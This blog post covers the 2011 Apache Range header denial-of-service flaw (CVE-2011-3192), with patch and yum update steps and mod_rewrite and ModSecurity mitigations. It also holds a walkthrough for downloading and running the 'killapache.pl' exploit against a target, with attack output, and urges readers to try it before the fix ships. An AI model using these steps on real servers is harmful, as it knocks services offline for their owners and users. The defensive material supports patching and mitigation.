apachekiller.pl

A few months back we posted about the Apache Range header flaw (‘KillApache’) together with a Perl script that can be used to freeze an Apache web server in seconds (we have tested it). This time Miroslav Stampar (co-author of the sqlmap tool) has written a Python version of the tool with a few extended features, named ‘KillApachePy’.

New enhancements:

  • Automated input parameters
  • Proxy support
  • Choose a custom page on your target
  • Choose a custom HTTP method, e.g. GET or HEAD
You can download it from GitHub.


Apache has released a patch for the recent Range bytes request flaw which we published a few days ago. This patch fixes the security flaw and

Change log:

SECURITY: CVE-2011-3192 (cve.mitre.org) core: Fix handling of byte-range requests
to use less memory, to avoid denial of service. If the sum of all ranges in a
request is larger than the original file, ignore the ranges and send the complete
file. PR 51714.

You can download the latest stable release here.

If you are running CentOS, you can update it this way:

Check for updates using the yum utility:
yum check-update httpd

Install it:
yum update httpd

If you don’t want to update, see this post for mitigation techniques.


We were following a thread related to the Apache flaw discovered by KingCope.

What is the ‘Apache Killer’ flaw?

It sends multiple GET requests with dozens of “byte ranges” that eat up the server’s memory. Byte ranges let a browser or download application fetch only the required parts of a file, which reduces bandwidth usage. This script instead sends dozens of unsorted, overlapping ranges in the request header to make the Apache server malfunction.

It is a DoS condition on the Apache web server. I performed a test with a script written by @KingCope and can confirm that it will eat up server resources in seconds.

A patch isn’t available from apache.org yet; we are still waiting for an update from Apache.

When someone executes this attack on your server, it will eat up 1 GB of RAM in 10 seconds, your CPU will hit a load average of 10 and your server will finally freeze. Test it out before Apache releases the fix :-D

How to use the ‘Apache Killer’ exploit on Linux (BackTrack 5):

Before you use this tiny script, you have to install one Perl module using the cpan utility.

cpan -i Parallel::ForkManager

Download the Perl script:
wget http://static.hackersgarage.com/killapache.pl.hackersgarage.com
mv killapache.pl.hackersgarage.com killapache.pl

Make it executable:
chmod u+x killapache.pl

Exploit your target:
perl killapache.pl example.com 50

Output:
host seems vuln
ATTACKING example.com [using 50 forks]
:pPpPpppPpPPppPpppPp
ATTACKING example.com [using 50 forks]
:pPpPpppPpPPppPpppPp
ATTACKING example.com [using 50 forks]
:pPpPpppPpPPppPpppPp

Mitigation for the Apache Killer Range header flaw

The following is from the Full Disclosure mailing list. More mitigation techniques are described at: http://mail-archives.apache.org/mod_mbox/httpd-announce/201108.mbox/browser

Option 1: (Apache 2.0 and 2.2)

# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range

# optional logging.
CustomLog logs/range-CVE-2011-3192.log common env=bad-range

Option 2: (Also for Apache 1.3)

# Reject request when more than 5 ranges in the Range: header.
# CVE-2011-3192
#
RewriteEngine on
RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
RewriteRule .* - [F]

Update 1 (26 Aug, 2011):

You can use mod_rewrite to mitigate this flaw:

# Explicitly allow "Range: bytes=0-" requests from the Flash upload client
RewriteCond %{HTTP:range} ^bytes=0-$
RewriteRule .* - [L]

# @see http://marc.info/?l=apache-httpd-dev&m=131418828705324&w=2
# Reject more than 5 ranges. The condition has to be negated and has to
# allow an absent header (as in Option 2 above); without the "!" the rule
# would forbid every ordinary 1-5 range request and let the flood through.
RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
RewriteRule .* - [F]

For ModSecurity 1.x users the following might do the trick, assuming they don’t really rely on Range request headers for anything.

# ApacheKiller - 2011 Flaw
SecFilterSelective HTTP_Range !(^$|^bytes=0-$)
SecFilterSelective HTTP_Request-Range !(^$|^bytes=0-$)

This is supposed to say: we accept Range headers only when
- "^$" empty value - or header not present
- value is "bytes=0-"

Update 2: Apache releases fix
The complete release is available here.
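As an added example (not code from this post, the Apache advisory, or either tool), the following Python models the two defensive policies on this page: the "at most five ranges" limit enforced by the mod_rewrite rules in Options 1 and 2, and the sum-of-ranges check the CVE-2011-3192 change log describes (ignore the ranges and send the whole file when they add up to more than the file). The function names and the sample headers are constructed here; the handling of malformed range parts is a simplification and an assumption, not httpd's exact behaviour.

```python
import re

# Mirror of the mod_rewrite mitigation quoted above: accept an absent/empty
# Range header or at most five comma-separated ranges, reject anything else.
ALLOWED_RANGE_RE = re.compile(r"^bytes=[^,]+(,[^,]+){0,4}$")

def range_header_allowed(header):
    """True if the request would pass the Option 2 rewrite rule, False if it
    would be answered with 403 Forbidden."""
    if not header:
        return True
    return ALLOWED_RANGE_RE.match(header) is not None

def parse_byte_ranges(header, file_size):
    """Turn 'bytes=a-b,c-,-d' into inclusive (start, end) pairs clamped to the
    file. Assumption/simplification: malformed or unsatisfiable parts are
    skipped one by one instead of invalidating the whole header."""
    ranges = []
    for part in header[len("bytes="):].split(","):
        first, dash, last = part.strip().partition("-")
        if not dash or not (first or last) or not (first + last).isdigit():
            continue
        if first == "":                       # '-d': the last d bytes
            start, end = max(0, file_size - int(last)), file_size - 1
        else:                                 # 'a-b' or 'a-'
            start = int(first)
            end = file_size - 1 if last == "" else min(int(last), file_size - 1)
        if start <= end and start < file_size:
            ranges.append((start, end))
    return ranges

def serve_decision(header, file_size):
    """Decision described in the CVE-2011-3192 change log: if the ranges add
    up to more bytes than the file itself, ignore them and send the complete
    file. Returns ('full', bytes_sent) or ('partial', bytes_sent)."""
    if not header or not header.startswith("bytes="):
        return ("full", file_size)
    ranges = parse_byte_ranges(header, file_size)
    total = sum(end - start + 1 for start, end in ranges)
    if not ranges or total > file_size:
        return ("full", file_size)
    return ("partial", total)

# Constructed samples: one ordinary two-range request and a 1300-range header
# in which every range overlaps the start of the file (the flood pattern).
LEGIT_HEADER = "bytes=0-99,200-299"
FLOOD_HEADER = "bytes=0-," + ",".join("0-%d" % k for k in range(1, 1300))
```

On a 10000-byte file the legitimate header passes the rewrite rule and is served as 200 bytes of partial content, while the flood header is rejected by the rule and, under the patched logic, collapses to a single plain full-file response.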
